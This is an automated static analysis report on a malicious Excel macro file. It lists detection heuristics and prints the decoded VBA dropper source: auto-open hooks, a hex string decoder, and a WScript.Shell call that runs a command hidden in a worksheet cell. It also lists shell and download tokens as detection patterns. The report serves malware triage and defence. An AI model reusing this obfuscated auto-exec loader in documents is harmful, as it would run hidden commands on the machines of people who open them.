Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d856ce2b96e10fe…

MALICIOUS

Office (OLE)

Size: 45.5 KB
Created: 2018-04-13 12:28:44
Authoring application: Microsoft Excel
First seen: 2021-02-23
MD5: c9a696ae8418ba58359d61b61d3adf3a
SHA-1: 50594ce2c9eabd6c6a01c60073f761f7e2018a6b
SHA-256: 7d856ce2b96e10fef190ee959c6c3eae5aeae6e9c2994fe002ad4e8cf3253674
Risk score: 346

Heuristics (11)

  • Office EPRINT stream contains EMF object (high; CVE-related) [OLE_EPRINT_EMF_OBJECT]
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and, when paired with exploit-payload anomalies, is evidence of Office object delivery; the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Xls.Malware.Valyria-6700358-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0.
  • Excel 4.0 (XLM) Auto_Open + macro sheet (critical) [OLE_XLM_AUTOOPEN]
    Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet, the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
  • VBA macros detected (medium; 6 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject call.
    Matched line in script:
        Dim PY_C As Object: Set PY_C = VBA.CreateObject(ECY_CB("B9B5C5D4CBD2D690B5CAC7CECE"))
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro (low) [OLE_VBA_DOCOPEN]
    Document_Open macro.
    Matched line in script:
        Public Sub Document_Open()
  • Workbook_Open macro (low) [OLE_VBA_WBOPEN]
    Workbook_Open macro.
    Matched line in script:
        Sub Workbook_Open()
  • Auto_Open macro (low) [OLE_VBA_AUTO]
    Auto_Open macro.
    Matched line in script:
        Public Sub Auto_Open()
  • Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 230 bytes
SHA-256: 71a3a7a2e8cc9171c7e1df1e35a039b0c01da36784f2f7b8c3388187663fd782
Preview script (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  NewDo
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9605 bytes
SHA-256: bb44e4733a14ef7c10d3c557ea42af2032cb0e5e4a13887351f8e6feb20b0f8c
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely (carved artifact contains 22 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Sub EPZSWL_KQE()
    HSX_V
End Sub
Public Function ECY_CB(ByVal text As String)
   Dim AXJ_NG As String
   Dim PE_Y As Long
   For PE_Y = 1 To Len(text) Step 2
        AXJ_NG = AXJ_NG & Chr(Asc(Chr("&H" & Mid(text, PE_Y, 2))) - 98)
   Next
   ECY_CB = AXJ_NG
End Function
Public Sub Auto_Open()
    Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub
Public Sub Document_Open()
    Application.Run ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub
Public Sub HSX_V()
    Dim PY_C As Object: Set PY_C = VBA.CreateObject(ECY_CB("B9B5C5D4CBD2D690B5CAC7CECE"))
    Dim ANS_MO As String
ANS_MO = "9B787DA1D28BD2A18CA1B3A17EA16AA1A1A1DDA17CA1AEA1C6A1A1A1A19E9B6BBB68A1A1A176A178A1A1BDB0A1A1A1A5A1A8A1E1A181C2A1896EA7A1CAA177A174A1A1CFA163A1A1A192A1A1D7A174A1A1A1BDA1D39CA112A1A1D1A1A1A7A1DBADC8A17DA6B6A1A1A1A19695"
Dim B_WEV As String
B_WEV = "AEA1A1DBA1A1ACA18FCFA192C5A1A1A1A1C0A195A1A1A0697FA1AE66A1A1C0A1C7DCA1A1A1A1A162A194A1A1CDC2A2A194A1A1CD7A7AA19DA1A1A1A1A1A77083A1A1A0817CA1A1A1A1C8D1A1AF6E85A168A191AEC494A9A1A1A163A1DEA1A1D8A1D9A1A175A1B1A1CCCFA1A1"
Dim V_D As String
V_D = "A482A1A1A1A1A1A1E0A1A1A1A799A1A1698F90A1A173A1A1A1A19BA1A1A1A6D5A1A1A071A1CBA4A183A168A1A1A1A1C4A2A197AB70A1D19CB6A1AEC9A1A1A1A1A1D7C4A17DA1A1BED7A1A1DEA1A1A1A1E1A1A1A0AFA1D0A1A18FCBA17DA1BFA18B807BAD8AA9A1A1A1A180A1"
Dim OX_X As String
OX_X = "A1C8DCB1A1A17EA1A6C3A1A179CBE1BDC8BCCDA1A1A1A1A1A1A19A82A1C6DCA1A1A1ADA17C96C1CAE06DA1B9B972A176A1D4DBA1C49FA1A1A1A19AA195A1A18ED2CD7FA1A393A1656CA1A1A1A0A1D4BD6EA1A162A183D0A1A1C3A189A1A1A167A18DA1A9C1A3E1A1BAA1A1A1"
Dim H_V As String
H_V = "DCA1D0A1AEA1A1ABB1A1A1A1A1E0A1E1ACA1A1877564A1A5A1A195A1A190A17CC3A16FA179A1A194CEE14D9170A196A1C8A1A1A1A1A19FC577A183A1A1C5D3A19EAAA19593CD86CBB96AA1A166A17DC8A1A1A1CA7182A1A1A172A1A1A1A1C19CA1A1DAA1CC978DA1A1A1B1A1"
Dim JXU_VH As String
JXU_VH = "73A168A17DDAA16BD67DA1A1C7BDA18BA1A1A1A1B9A1A187ACBAA1A1A16DA1A1A1A6A1A1A16FE1929AA1A1A1A1A1A199BBA19AA1A1A1C5A1A18FA1D6A1D7A6A1A1787DD8A1D76FCD8194A180C3DCA1BE94A1A1A16F62C37F63A1A1A1A1B187A1D97F87A17DA16E16A1A1A1A1"
Dim EUA_Q As String
EUA_Q = "A1A1A1A179A166A1DEA1A1A1A1D7A5A177A1A16E8CA1A5B7A1A3B1E17275A1C8A1C8D07A8EA1A1A183A1A1A1DD667FCFA18EA1A1A1A1A1B4C092A1C8A1A1CA74A565A1698CCB7F6C99A1AEA1A1A1A186A1A1D7A1A170A1A1A1A1A194A1AEA1D49A63A1C7A123A1A1A2A0A1A1"
Dim L_SQ As String
L_SQ = "C9A1A1A1A1C5A1A1A1C5A1B79E67B0A17CAEA1C3DE7982A1A16CB8A1A695ABC27EA1A1A171A16FA1A19D898EA1A1CBA286A8A17469A1A1A1A1A1A187A192B4A182B9E1C3DD9E71A1A1A1A1A1B2DEA1BA82A1C6A16BA17A72A1A1A1D0A1A16DA199D298A1A16BA1A19ACFA198"
Dim BK_ZWR As String
BK_ZWR = "9381A1A181A5A19478A1C9B2A17BAD9AA1A186A1A1A864DAD8A1A1A19AA0DDCBBEA1A1A1A167BCA1A1A1A1BCA1A1A1D66AD1A1B3A1B5A1C2BFB7A7DB8BA1D2B4A6A1C6D86BA0A1A1A1E1A1A1A6A1A1976EA16CA16FE1A1C8A1A1766DBCA1C06AD96CA1A1A1937EA17992CB63"
Dim YAH_YGM As String
YAH_YGM = "A172D6A1A1A1A9A9A1A1A1A1D3A18792ABE1BF9C97A198A1A0A1A178A1A1A1A1B8C8A1A191A1A1C3BDDDA4BDC26C9BA1BB8EA1A0A1A1686AC4A1A1A177A19CA1C2A1A1A1A18FA1E1C6A1C1C6A1A1A18395A1A1C2C9A164A1A1A1A1A1A7A169A162AEA17FA1A187A1A1A187A1"
Dim QE_G As String
QE_G = "A1A1A1A1D2D3A1789EA169C2A1D7A1BEBCA1A1A165A1A1A1A1A1D669A1A178A1A1C5A17A6897A18FA1A1BC88A1B0A1A7A1BBAB70A1AA70A1A17FB3A1A1D6D3A1A1A192A1A1A3DFB289A16898ACDC7AD8A1A1B7A1A1BB7DA1A1AAA1A1A1A7808EA1A1A1809DE1A1A1A1A1A1A3A1B667A1A888A1A1A1D577A1A1A1A1CE94A1A16BA1A184BAA8A4A1A1A162A1A1A1ABA1A16BA181D3B2A1A16AB7A1A1AAA1"

    PY_C.Run ECY_CB(ThisWorkbook.Sheets("NewDor").Range("H215").Value), 0, True
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & ECY_CB("A7B2BCB5B9AEC1ADB3A7")
End Sub
